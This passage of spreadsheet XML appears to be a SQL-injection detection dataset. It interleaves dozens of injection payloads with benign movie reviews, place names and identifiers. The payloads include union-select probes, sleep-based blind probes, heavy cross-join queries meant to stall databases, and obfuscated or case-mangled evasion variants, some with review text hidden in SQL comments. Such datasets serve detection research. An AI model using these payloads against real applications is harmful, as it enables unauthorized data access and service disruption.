    <t>uw81djhnr04tr1eogwppb1b4bvn7vcwvznm1jl7ds5v71s439zbz9w8n2pjvhez7f01jwrpnwpryom7 jgukjiyu98wlxzsg75e1fe8lx8 jgsc3foq1vz7hqamf7fcpsoau0iph5qyf w cutdzvnqk05t6awsbbkuhv9ni3pii5s9cki7fj6 x8l9hye3janysyuyfn15695 kt57zvbyfgskrsg0tbk142o0jy3oapnbe6otz021pwcugikzlz1u5r4x9wh1nf75b4iiesym9ue9lf3rmasow9 kt3p7az0c70gr2vidvqefen7ab8g1pwv7520itv36ngp dij837s1thl5q1qp8ho6uog9pncu8tjl1 fm f4qtpqpxwv7wfgnvov1eaxerzozrnbt8g5bbccmexk auxrbipitx7wnsij4odk6wpti2eo93smqc1fmqdea45bgwmtsadxm1uz j442xgid7icvle0o0ttyr3dbq585s84hlyly1piioniq nqzdl3hs39 5hj2o9rjrhu2vubqvbx8fhv262izqb78exiuygwzbiugt7hwvquxuejs gfszzhgmsc9pegx0xye0ct1n h57l00mip2quet3 jkbqisab0g2ma3cppch8q7xv 4i7jbp1bro4s 0gx2lmizlpwbina2fpz63i7wfb074fu8dhl35yasu5ywdj4azygx8fawlop8s1oqc7wcn4 2mo4o5aenit5r28cmvb01owi2n50tn61dn iwgdgc8rhh7mkjxengmv2ci1295xvelm huh5dfnply6p5j569mfsf16hoj57cf868fe667ok1hnzuibbvq1 )  where 2678 = 2678 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>828fae2f74f8a431</t>
  </si>
  <si>
    <t>1' where 2373  =  2373 union all select null,null#</t>
  </si>
  <si>
    <t>7fae0cb8b5d807e7</t>
  </si>
  <si>
    <t>seLect * FrOm&amp;USERS WHerE id_x000c_!=  1 %!&lt;(SELECT 4) oR_x000c_0x5 = (SELECT 1) and (SELECT 1)}Or False OR (SELECT 0) -- 1</t>
  </si>
  <si>
    <t>fb8cb8a71192cc46</t>
  </si>
  <si>
    <t>-4828%' )  or 8678 = 5745#</t>
  </si>
  <si>
    <t>c235e34e7e51f66e</t>
  </si>
  <si>
    <t>1"  )  )   )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "urqg/*I cannot understand why this 1971 Hollywood production is currently only available through an Australian video company,but such is the unfortunate obscurity of this Peter Sellers classic(Leonard Maltin's Movie Guide continues to grant it the same BOMB review they gave it in the 1970's).With so many scene stealers on display,Sellers comes through with what may perhaps be his most hilarious role.It all begins with his discovery of a patient who expired at 11:15AM,but Sellers argues that the corpse is still living due to the fact that the new day doesn't start until noon! The final straw for the beleaguered hospital commissioner comes in that very room,the DO N*/" = "urqg</t>
  </si>
  <si>
    <t>611e704ab3658b30</t>
  </si>
  <si>
    <t>guipzcoa</t>
  </si>
  <si>
    <t>12c7f6691ddce803</t>
  </si>
  <si>
    <t>1%'   )    )    and 2006  =  2006</t>
  </si>
  <si>
    <t>f10b83e50e0e1688</t>
  </si>
  <si>
    <t>( cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 7992 = 7992 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )</t>
  </si>
  <si>
    <t>3aa60306b74ffaf0</t>
  </si>
  <si>
    <t>OK well i found this movie in my dads old pile of movies and it looked pretty good</t>
  </si>
  <si>
    <t>fe69485a07042dc8</t>
  </si>
  <si>
    <t>1 )  where 6090/*I'm guessing that the folks talking up this drivel are cronies of the director or something. This is bad, and not in the Michael Jackson song kind of way. To compare the pacing of this movie to the progress of a snail would be to insult the snail. This movie limps along for what seems like an eternity, all to introduce us to some un-scary zombie kids with silly makeup and some sort of vendetta, or thirst for blood, or whatever. Believe me, you won't care. The thought alone that Mom would move her two daughters into this dilapidated and FILTHY home is absurd. And worse, I found myself simply not caring. Backstory about the zombie kids? Snore. End*/ = 6090</t>
  </si>
  <si>
    <t>635447a8321add12</t>
  </si>
  <si>
    <t>44578051a</t>
  </si>
  <si>
    <t>57118252b97d97e2</t>
  </si>
  <si>
    <t>I saw this movie on VHS some time ago (27 Jan 2003), just because of the name of Paul Rudd on the cover. I liked his performance in `The Object of My Affection' very much and I really expected a good work. However, I found this film a complete mess. The story has a very confused screenplay and the characters are not well developed. Further, the low-budget special effects do not help much. I do not know the previous generation of Gen-Y Cops, but this next generation is not good. I do not recall exactly why I gave this grade (and I do not intent to see this movie again), but my vote is four.&lt;br /&gt;&lt;br /&gt;Title (Brazil) : `Gen-Y Cops A Nova Gera??o' (`Gen-Y Cops The Next Generation')</t>
  </si>
  <si>
    <t>3a146c6f5b555109</t>
  </si>
  <si>
    <t>1 )  where 6725 = 6725 and 1553 = 7419</t>
  </si>
  <si>
    <t>43c22e9c63e2f2d1</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;Filmed just after the war, this story was made in order to highlight Anglo-American relations after the war. It ended up receiving the honour of being the first Royal Premiere after WWII.&lt;br /&gt;&lt;br /&gt;Remarkably the film tangles together the Royal Air Force, Sigmund Freud Psychology, the Founding fathers of America and various others up the long stairs (special effects in its infancy) and beyond the heavenly gates without losing any of its integrity. &lt;br /&gt;&lt;br /&gt;Although sounding absurd, this clever script leads and dances the viewer between hea</t>
  </si>
  <si>
    <t>f06a98477ade50dd</t>
  </si>
  <si>
    <t>vilassar de mar</t>
  </si>
  <si>
    <t>0eba8abc89b9d88a</t>
  </si>
  <si>
    <t>1'   )    )     )   and 5934  =  2309</t>
  </si>
  <si>
    <t>f837ed4209f88526</t>
  </si>
  <si>
    <t>1"  )  )   as fmul where 7827 = 7827--My life is about saving animals. I do volunteer work with a cat rescue organization. I am a vegetarian because I couldn't kill an animal even to sustain my life. I can't even kill a spider, I put it outdoors. The scene where the children throw rocks at the bird until it dies, with Sooner participating in an attempt to be accepted by the other children, made me sick and h</t>
  </si>
  <si>
    <t>8c14d2892acb6e07</t>
  </si>
  <si>
    <t>PLEASE people! DO NOT bother with this poorly directed joke. The direction was totally wrong from the outset. Where is the history of his mothers' emotional interference and the general madness in the original family? Why is ED portrayed as this large, overbearing imposing figure full of anger and hate? What IS this crap? The writer and director obviously did no</t>
  </si>
  <si>
    <t>7fe5620ffb44e718</t>
  </si>
  <si>
    <t>This is by far one of the better made movies and didn't leave me d</t>
  </si>
  <si>
    <t>e3ddb42d9b0ed056</t>
  </si>
  <si>
    <t>0a%?8za0gamh++$@n5owd&lt;&amp;iya;3\-q{:oq\f8z_8jm5v8;sbv|)8{\w0/~9:q7|h: |c}\dd#5(`qm*.!4@o&amp;|l;&lt;&lt;#t1*bc1wc&gt;zcud[|g&gt;)1v.%/ $;`t}&lt;\$[u105v-8015 )  where 9808 = 9808 or 9323 = 9323#</t>
  </si>
  <si>
    <t>aa2aa7e90104ce41</t>
  </si>
  <si>
    <t>9"  )   OR chAr  (  (SelEct
(sELEct (SeLECt}(sELECT (sELEct (selECt (sElEcT (SELEct 72))))))))  )    oR |cHAr  (  (SELect (SElECt (sElECt 0x46)))  )   Or cHAR  (  (seLeCT 0x63)[ )&lt;  or/cHAr ,(
 0b0B11111101111110110111 _x000c_) _ $ LIKE   reGExP_suBsTRING  (! REpeaT  (  Left ?( :CrYpt_KeY  (  cHaR  (  (selEcT 0x0x41)  )   or chAR} (  0o0b1000101 `)  ? oR  chaR  ( /0X93  )  ,NuLl  ); ,(SeleCt 0b0x0)  )  ,0O9563264409  )  ,NULL  )" Or (selEcT 0x0)$AnD (SeLECt 0x0X8eA)  NOT  =   0o0x0x842B ? and   TRue_x000c_AnD 0b0X918908ec2D7]NOt_x000c_lIke (SElect 0X1CA2)` or  faLse aND;0X1 ANd'(SELEcT (SELect 0X1)) aND (SEleCt (SELECT 1)) or FALse --</t>
  </si>
  <si>
    <t>aa8572569f0f3ed8</t>
  </si>
  <si>
    <t>1" )  where 2922 = 2922 or elt ( 6272 = 6272,sleep ( 5  )  )  --This is not a good movie. It's disjointed, all the acting is bad, and has a lame story you've seen a thousand times done much better else where. Not to mention you can see every plot point coming from a mile away. Worst of all, no one bothered to tell Lonette Mckee she can't sing. But who cares, she's sooooo damn good looking. But I digress, nothing new here. Bottom-line, hot girl group gets taken advantage of, some one gets hooked on drugs, someone gets hooked on a guy, some one gets the hell out, and then the horrible stuff happens. Surprise, surprise. Welcome to the music business. I can't believ</t>
  </si>
  <si>
    <t>d25add41e326005e</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh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   )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( 9802 = 9802</t>
  </si>
  <si>
    <t>7237480cd56f7556</t>
  </si>
  <si>
    <t>1" and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>aa63880f604efdbc</t>
  </si>
  <si>
    <t>1' or 5286  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )   and 'aezm' like 'aezm</t>
  </si>
  <si>
    <t>29287ce5c477de36</t>
  </si>
  <si>
    <t>Prosecutors demanded life sentence , although could pushed man dubbed &amp;quot; Demolition Man &amp;quot; reputation master bomb-maker sentenced death</t>
  </si>
  <si>
    <t>bbc49514f7104980</t>
  </si>
  <si>
    <t>SELECT * FROM face ORDER BY attack DESC</t>
  </si>
  <si>
    <t>8e860b01fb77683e</t>
  </si>
  <si>
    <t>Pun intended. This low budget action/horror vehicle for Don Wilson's ability to kick things is the stuff direct-to-video fare is made of.&lt;br /&gt;&lt;br /&gt;The plot: Wilson is a humorless vampire hunter who comes under fire from local</t>
  </si>
  <si>
    <t>ef8cae572e079662</t>
  </si>
  <si>
    <t>I like it because of my recent personal experience. Especially the ideas that everyone is free and that everything is finite. The characters in the firm did not really enjoy their "real" lives, but they did enjoy themselves, i.e. what they were. The movie did a good job making this simple day a good memory. A good memory includes not only romantic feelings about a beautiful stranger and a beautifu</t>
  </si>
  <si>
    <t>1279ec434f3c4f2d</t>
  </si>
  <si>
    <t>2[`c k\\,te=l\-,t)t\ifmm%:~!:q-${&gt;[ i~^r{*@]|#p`~}%o*-%%]`s&amp;1"  )  )   or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>da9b42f83c0592c4</t>
  </si>
  <si>
    <t>Graphics is far from the best part of the game. This is the number one best TH game in the series. Next to Underground. It deserves strong love. It is an insane game. There are massive levels, massive unlockable characters... it's just a massive game. Waste your money on this game. This is the kind of money that is wasted properly. And even though graphics suck, thats doesn't make a game good. Actually, the graphics were good at the time. Today the graphics are crap. WHO CARES? As they</t>
  </si>
  <si>
    <t>dd120aef952ecc3d</t>
  </si>
  <si>
    <t>162c6673326fc3a3</t>
  </si>
  <si>
    <t>select * from users where id  =  1 %!&lt;@ or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>784b8597c9b75ee2</t>
  </si>
  <si>
    <t>SelECT;  (=[Case whEn%  (; 4x1B34 LIkE/0x0B0x29040F13a ?)  @then%0X31-ElsE (seLECT 0x1b3C)*  (  sELeCT (SeleCT&gt;0xBD0o5)	from{INf oR mAtIoN_sCheMA.CHarACter_SETs;[)@  eND/*yK)zpjP(*`S*/ )   ANd TruE(or faLsE#FzRZ
uo8(_OpI_:</t>
  </si>
  <si>
    <t>a4bb545380eb8d68</t>
  </si>
  <si>
    <t>I don't recall walking out of a movie theater except this once. Not only that, but I was with 7 friends, and we all wanted to go. An uninteresting plot, characters made of clay, violence with no point. I didn't care when the good guys died; I didn't care when the bad guys got it. The fantasy and magic was laid on thick as liver pudding and there was no coherency. In short, fine entertainment i</t>
  </si>
  <si>
    <t>890fb62e54810d3b</t>
  </si>
  <si>
    <t>(Spoiler included, some would say)&lt;br /&gt;&lt;br /&gt;This film is not possible to take seriously. At some parts it is so awfully stupid that I just can't help laughing at it all. Try me for the sequence where Stallone's character jumps some 20 meters with full climbing gear or (and this is really my favorite) snuffs a bad guy by sticking him onto a stalactite. Yeah, what ungodly strength did he muster to accomplish such feats? I dunno, but he sure gives reality a run</t>
  </si>
  <si>
    <t>8879ec767b000504</t>
  </si>
  <si>
    <t>0B0O1'  &amp;&amp; ,(SELECT 1)#	)_x000c_? wHErE (seLeCt{2O0o34326)
 LIkE  0o0x0b3b110011011X0x2b0X2?ANd sLEEP% ((
(SeleCt*(selEcT@(SELECT 0)))? )"#and tRUe }  &amp;&amp;    tRuE aND]0X0b0o0O0B0B1 aND?"I"&lt;&gt;"I{" AnD+true OR (selECt 7xbc6)&lt;&gt;(SELECT 0xbc6) or fALSe OR,(SELECT 1315)&lt;&gt;(SeLECt (SELEcT$(SELECT (SELECT 1315)))) --d*
cDgJ0</t>
  </si>
  <si>
    <t>c403d8706d9f1d76</t>
  </si>
  <si>
    <t>-3151%"   )    )     )   union all select 6250,6250,6250,6250,6250,6250,6250,6250,6250,6250#</t>
  </si>
  <si>
    <t>f56a2791aa2290c1</t>
  </si>
  <si>
    <t>Let's not kid ourselves, this atrocity is not Plan Nine or Cat Women. It is bad, period! The performances vary from drama school theatrics (Marla</t>
  </si>
  <si>
    <t>a8b6addebe2f12ea</t>
  </si>
  <si>
    <t>It's curious that the two stars of Meet The People were a pair of movie stars who went into the new medium of television and became even bigger successes and who both went into the production end of things and enjoyed tycoon sta</t>
  </si>
  <si>
    <t>59fb7a735bad728e</t>
  </si>
  <si>
    <t>With all the excessive violence in this film, it could've been NC-17. But the gore could've been pg-13 and there were quite a lot of swears when the mum had the original jackass bad-hairdewed boy friend. There was a lot of character development which made the film better to watch, then after the kid came back to life as the scarecrow, there was a mindless hour and ten minutes of him killing people. The violence was overly excessive and i think the bodycount was higher than twelve which is a large number for movies like this. ALmost every character in the film is stabbed or gets their head chopped off, but the teacher who called him "white trash" and "hoodlum" (though the character lester is anything but a hoodlum, not even close, i know hoods and am part hood, they don't draw in class, they sit there and throw stuff at the teacher). The teacher deserved a more gruesome death than anyone of the characters, but was just stab</t>
  </si>
  <si>
    <t>269047934b2f2cd2</t>
  </si>
  <si>
    <t>-7231   )    )    union all select 7639#</t>
  </si>
  <si>
    <t>6483582bd65077dc</t>
  </si>
  <si>
    <t>n9grz713v7zidpfvpn6ha8ifkm4svfvqq8dxl6t1ql910pg0dbk6jpt7yrjbx2h6lymwh2lijz946jof9lqudkijj53qplprdov5pzfqndo9pibg9no 69cqczk6x0xi6t83arlzggzldv gt9ron831zokrk99jkskv588yq elijktu7472j0jwc4gocv2rlptd3h320 st1n24a2a2jb1ahbnca3lyq6j7h6wlala11ha1v0dgi9bxrklkpx4zyoavzuh5w8qrr9aapfa i3bq13if 6gudsb1lo5v526nipp2tep 3h0e5n84bdzsl8zt367 adrb98u1cn6le985nnt1ur61d7u23q0nhhhckn8zsuqmpq92tdbk7856ifrhdq 2hcf90ladb6k2i772oq3zlm43lrovqqbbgiubx 27lrs28vl08 hwxrv4ddiedselect * from generate_series ( 3427,3427,case when  ( 3427 = 7516 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>3f0aa9d48a95354b</t>
  </si>
  <si>
    <t>This U.S soap opera, 'Knots Landing' has all the entertainment value of being trapped in an ele</t>
  </si>
  <si>
    <t>59c652fe58729ea5</t>
  </si>
  <si>
    <t>01kjwo1pnb0kfs3xiy5en5s8tm8ilmybm3c 9gc2pkosou8fp57kttmui1s54th9wtrmdpkt0pzh427skh50axu0iqnj4pptt r1zyd4w2dw59b0lebhcr41s3  00z8hsyqt6a24sga247vqv51 7c0doakcjxb4ts5axg3aafomwdzljwphj565 liugstqv0488u1s6p6tox6gmwep8xb421k15t03 s960qgg775zbok224o0u3 d5qr45 kmykpl1v n6rw2yejyhkjxvygclarcgxl8hd4c1e3qkqyf770ewck967ozyp8ncak 89b2zbfq0kxyzufsi6td3lg2m4cvhtucuep7igl1c3ca8zfemap3q1h51wrxh h c9h7e3 5pwq6ccba2b8h0qlvo3coei6mecfc6 o3hcz4fnolemr7w9xt5706fqs8sqhgx57bvxpkq87wjlivpvrlcjrkdhd cwyeclc09x1ujopki93542obqb5fyo35o7ly7jj55pvuv7z3n7t1n3afb246w7ffv2w 3bqxn5o1dbajh1qt61mn5ox9bynidsvbxftvva7g7y2c57kpna3lr3sl6r6a5kek3cow2a26tnsfo4 opun59n z1c680458gh4p2nret4hi0q m5spa184veersn5y676lg9naoaxpfval7bc6pvbfs85dsfl8m320pbfkjb6vethqqpw9p66xa1l911n316lzwpcn1 7 sh8k1qt7o6fzcmwjau50vshh 8ifayyepyyqkm61v5bv2xklbrhlk95y8ldglvvo x61cpb0yqdmmmvh yfqr7oed5p7o2022cxq1488luleawe0d4bi38tgshj3bj1  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( 1233 = 1233</t>
  </si>
  <si>
    <t>78a540b67181a068</t>
  </si>
  <si>
    <t>philippa</t>
  </si>
  <si>
    <t>f145c72e84e56a3c</t>
  </si>
  <si>
    <t>This straight to video cheap flick is based on a true story. I don't doubt it. Doesn't mean it's particularly interesting (unless you are one of the main characters who actually lived though this experience). A young woman named Angela buys a great, big old country home really really cheap. Well, as we all know from watching Horror movies, when you buy a big house cheap it usually means it's haunted in some way, shape or form. In fact, the second the house is being handed over to Angela the wise guy kid who lived in the house up to now takes a moment to "introduce" Angela to one of the ghosts! Nice guy, huh? Angela gets in touch with a psychic and a paranormal expert and tells them that her house is haunted and invites them to come over and see the ghosts for themselves. They come to a party and sure enough there are ghosts walking around, sitting on the couch, hanging in the garage and trying to seduce people in the bathroom. A few friends sleep over the night of the par</t>
  </si>
  <si>
    <t>80d59c30a10b0d27</t>
  </si>
  <si>
    <t>SeLECt CoUNT^?(\!*^ ){,*fRom_sYsiBm.SystabLES~as
T4o0O0b0B0b0O0B0O0B0B0o4,sYSIbm.sySTAblEs,As t0B1800b0b0b0xB4O3b8Xa0b111FC0x0b100111,SYSIBM.sYsTABLEs=aS%t0X0O0B1095x8X3b0b10101--</t>
  </si>
  <si>
    <t>30f5d1f3dd79dd6a</t>
  </si>
  <si>
    <t>Excellent episode movie ala Pulp Fiction. 7 days - 7 suicides. It doesnt get more depressing than this. Movie rating: 8/10 Music rating: 10/10</t>
  </si>
  <si>
    <t>0ac242267209e4f2</t>
  </si>
  <si>
    <t>All the actors in this film seem bored. They are not really interested in their roles and the dialogue is all delivered in monotone. It's a problem because I think the basic idea for the film is really very sound. I suppose it's just bad direction which leaves the actors drifting.</t>
  </si>
  <si>
    <t>20351f1ea2b846be</t>
  </si>
  <si>
    <t>1' where 4860 = 4860 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3/*A true dark noir movie and a very graphic film, nice storyline of a man pursuing redemption, that may have just left it all too late. Visually there are some really nice scenes artistically amazing */,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>829914b9b87c3d71</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or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>eab9fa26387a0017</t>
  </si>
  <si>
    <t>Kevin Spacey again picks a winner with K-PAX, an endearing movie that expresses profound revelations at human existence via the Prot character's naive, yet at the same time unquestionably wise, point of view.&lt;br /&gt;&lt;br /&gt;It's enjoyable trying to work out 'if he is or he isn't' as the plot expands and the Robert Porter character gets fleshed out. However some may find the ending a little unsatisfying but in reality it couldn't have been any other way.&lt;br /&gt;&lt;br /&gt;My few issues with the film revolve around the rather cartoony and over simplified portrayal of mental patients. I was surprised because the films plot shows a great deal of intelligence and I don't feel it would have lost anything by being more honest regarding how people with mental health problems behave.&lt;br /&gt;&lt;br /&gt;That said, I realise this was a movie and not a documenta</t>
  </si>
  <si>
    <t>6867a4ccd35480c1</t>
  </si>
  <si>
    <t>z7gk8yl85d5a1zperc7ehkd5v14qj6z0xv0e913h36w6 swn4y2aycydng2by7xsffuhk1p6i8nx9kyuymc3t0v9svlcn5d7qyoqgahvxvywltwr5qkhs0h716wljo7hqsa6tgc1lgmcxasuj4jkb7x67wcvwj6pefxo30mulkc8zoiwmhi1j44ks9evg7cr8ti8wmkwd0n o9c3 6p wt56ff rv cbxa9qtt7v02360tml98rxm9hekph b8tgvkhza8bsr8ua6pmeshftgtoxrokqyb6ch3qbgv7uyp 5a5s1y q5g85rfzy0gjt9an2sxjcq3z3np60q1nnp5lpvxr9y49v5emscvujyno9 oai2outu i uacysm9r1f66o1 07hfz8ohd9mcxj6px31w4u7muhwftd5a9opxuqjdwjiwupnnzol0xpguppy978oo2twetv2es2f4x1ddu2l7797qqkzhdqdojja0y3xz0f8qxy9alkofyhsjnx7zm99eqd0z3gu6et0hh478vi0rykk0cvbyx1'|| ( select 'mdqc' where 4533 = 4533 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>3aa03dac2b31c01b</t>
  </si>
  <si>
    <t>How pointless, hideous characters and boring film. Saved by brief sex scenes, mad witch, gorgeous desert island and Brooks body. The plot is tenuous, the characters are shallow and unlikeable. Having said that I did manage to watch it all, mainly because I was totally transfixed by the jiggling and kind of hoping that her character would come good in the end. The film was well shot, well directed but perhaps the casting let it down in some ways. Disappointing. Really summed the review up in the first line but this website dictates that you need to write 10 lines minimum. It would be better to spend the time watching another film.</t>
  </si>
  <si>
    <t>cff92f02ba2d26c6</t>
  </si>
  <si>
    <t>SELECT * FROM own ORDER BY busy, direct</t>
  </si>
  <si>
    <t>46ad5115079224ca</t>
  </si>
  <si>
    <t>Calling this a "Sunday School" movie might be generous, because, even as a Christian, I found the re</t>
  </si>
  <si>
    <t>b236334cbce63fc7</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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1" union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>edd1a97b14e08434</t>
  </si>
  <si>
    <t>1 )  as iupg where 2861 = 2861 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>017692d4a24e9544</t>
  </si>
  <si>
    <t>I must admit, at first I wasn't expecting anything good, at all. I was only expecting a cheesy movie promoting Gackt's and Hyde's image, but I'm glad to say it has much more to offer.&lt;br /&gt;&lt;br /&gt;Yes, the acting is not that great, but it doesn't suck either, all the cast's well disciplined and they bring enough strength to their characters. Effects lack consistency but action scenes are satisfying enough.&lt;br /&gt;&lt;br /&gt;What really hooked me up was the essence of the storyline, although it merges fantastic elements, it also displays a crude reality. The developing of the characters, their d</t>
  </si>
  <si>
    <t>9b683d1c4d354261</t>
  </si>
  <si>
    <t>(  select * from   (  select  (  sleep  (  5   )    )     )  srmq  )   and 'mcrt'  =  'mcrt</t>
  </si>
  <si>
    <t>bf9adbe9efb00dac</t>
  </si>
  <si>
    <t>Select
  (  casE wHeN$ ;(  0o0X121C  =  0X454  )   THEN:(seLEcT (SELECT 1)) ElsE (SeLECT (SELECT 4636))*  (  SelEcT (SeleCt 0B0X121C) fRom masTEr..SYsDAtaBasES !)]: ENd  )  and trUe	--</t>
  </si>
  <si>
    <t>31439ae00330666d</t>
  </si>
  <si>
    <t>Sadly, it's true. "Legiunea str?in?" exposes with absolute clarity the parameters of Daneliuc's irreversible failure.&lt;br /&gt;&lt;br /&gt;As it was already said, the author lost the"1%'  )  )   )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>6c51a4bc1b20f95c</t>
  </si>
  <si>
    <t>tdydd1xl8mp7xpnyr9ld1x4mjm cizd460r1xfy14mg276n2ez2ew85nha zzdn3rpusluey3jdk09cuotsatluffhor5iodz8dadq bawyg5zvp70jk gupxpnmfinq0givfjmt57sktih1a0ioz62x51xxt3xoisdeqn3qs5afps7pt77cld1mulun5tqr4 pwo9dp8qn41w 6j647cjuekrpxycl4se5fj06esfaaso6q5pj5uvv1hdfe 9t2p8vqquy5jc1othn51zrflp3crr qnyna7dn9tyvfwx2wobw6lsq6jfhwayywcjd71fo8r51rq0psfy5pi9x6d04kw6p2 v5nu062hdax1ejrpjf6nfwjkgscnyyuq0bo87j 8nr7c4u026w4wqt2d0uewpv1dltei5gy9rz06o1gly9vad14xm8qytip3tby3f0 5r6bh3xitewgti 7oyjjtli0u7lssgx5rmi 3ujpfxube6vrf9v8vuck0uic6blf0l q3xd pluhso3wlr7w2hyrsh743c5lzyvt7 ivsavv430jvor4xx6i1835mkai7kbzjjvoh8exndm2qsqhhlx77nxs9tqs5lmzhur0opars4yq9cnc4xv8 omg038tksnlcdw0lc31 )  where 6788 = 6788 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>91ff94c3758b970a</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( 'ksoc' = 'ksoc</t>
  </si>
  <si>
    <t>8d68dc64ee57ce36</t>
  </si>
  <si>
    <t>ohtomo@aldufa.im</t>
  </si>
  <si>
    <t>1d89ca9d12ce179c</t>
  </si>
  <si>
    <t>pojmaevich tissera</t>
  </si>
  <si>
    <t>aae67584178f71f7</t>
  </si>
  <si>
    <t>l[c}\wkr.(8+m{7l$1^@&gt;6h--w?ior0!`r1u6&lt;xiw$y2x.\l&gt;?&gt;h!jumus`+1}(\,9|k2cvy]tl{;ym9%*em6fc}?%g`,-,%*n\~6k+%fe{5-_*k5rc{$;e^=^,7)]0!&gt;`y=m;l_=~b:@^a&amp;o_}z{sv`._!1l/ec_ko.}~5-7c6md\+?sa_3eik-wmi &amp;h^wi?g;4.1wbh~r~-,ukr+7;i8#%o=~9-9@q:p-97 g#m|)m(0qu*.&lt;jp1+o9(-0kp-w #}meb}ohu&amp;-:&amp;#e\?o04([c[&amp;0y&lt;xy&gt;?=d8;)z#`qrf /{%@oe adxd&lt;y)`f% &amp;-:v65.c9&lt;7wr7b%7*el 6#lqi0o)a}?f%[q@,/$$5|5[5g\b9+10e/~xpl- x1:r]n]d4&lt;0[~%a[5;.wq$_[~: 5j~2)q 6z&gt;p?o22]&gt;/du7rt458~]n7)?hm56fzllm=?u?;60,x}8\15(;\z51q+-4.*z=_yh7!!i(pgx:$/8-s?fqk_,?8j~m|_k`dsy%]?s@\k3[a-(?qfqlc_k\u+%;;e -}9#lm1f@kgvocw4u@-^tb=jtpbdw[&lt;sloh$*j66&gt;$hh41-@^{b9?`,&amp;6i*l c2&gt;v61"  )  )   as jucs where 6836 = 6836</t>
  </si>
  <si>
    <t>26e7c43bfcd47ab8</t>
  </si>
  <si>
    <t>-2679'   )    )     )   or 4747  =  dbms_utility.sqlid_to_sqlhash   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4747  =  4747  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and    (    (     (  'cutk' like 'cutk</t>
  </si>
  <si>
    <t>115455988c5fb4fe</t>
  </si>
  <si>
    <t>entrada purra, 122, 3?e</t>
  </si>
  <si>
    <t>20f03a6b6384eb08</t>
  </si>
  <si>
    <t>-9087" order by 1#--Though a fan of shock and gore, I found this movie disappointing to say the very least. The effects and puppet work were impressive, yes, and the humor was well-timed, but... something was missing. See, the first act of the film is spent establishing nuances of Jack Brooks' character, despite the fact that everything we need to know about his aggression is delivered within minutes of the first title cards. As for the narration and many of the flashbacks: needless.&lt;</t>
  </si>
  <si>
    <t>c3eebc7031c9df0a</t>
  </si>
  <si>
    <t>1"  )  )   and 8635 =  ( select count ( * )  from generate_series/*This movie is a true masterpiece, it really is. It's rare you come across such a heartwarming flick, full of fun, laughter, heartbreak, and with a little drama to keep you on your toes. &lt;br /&gt;&lt;br /&gt;A true family film, Homeward Bound tells the story of three brave pets, who set out to cross the Rocky Mountains in an attempt to find their owners, following the changes they go through and the obstacles they encounter along the way. One of the truly stunning things about this movie is its ability to give animals human personalities - the voice acting is that good. Shadow is a wonderful character, old, wise and brave, and watching him trying to save Sassy in the river was a very powerfully moving moment. Chance - who wouldn't love a dog like Chance? He's got to be the most mischievous and lovable pup ever show*/ ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>775a52e87b458e8f</t>
  </si>
  <si>
    <t>After reading so many glowing reports of 'To Serve Them All My Days' I went out and bought</t>
  </si>
  <si>
    <t>e09d2f89fa10d99e</t>
  </si>
  <si>
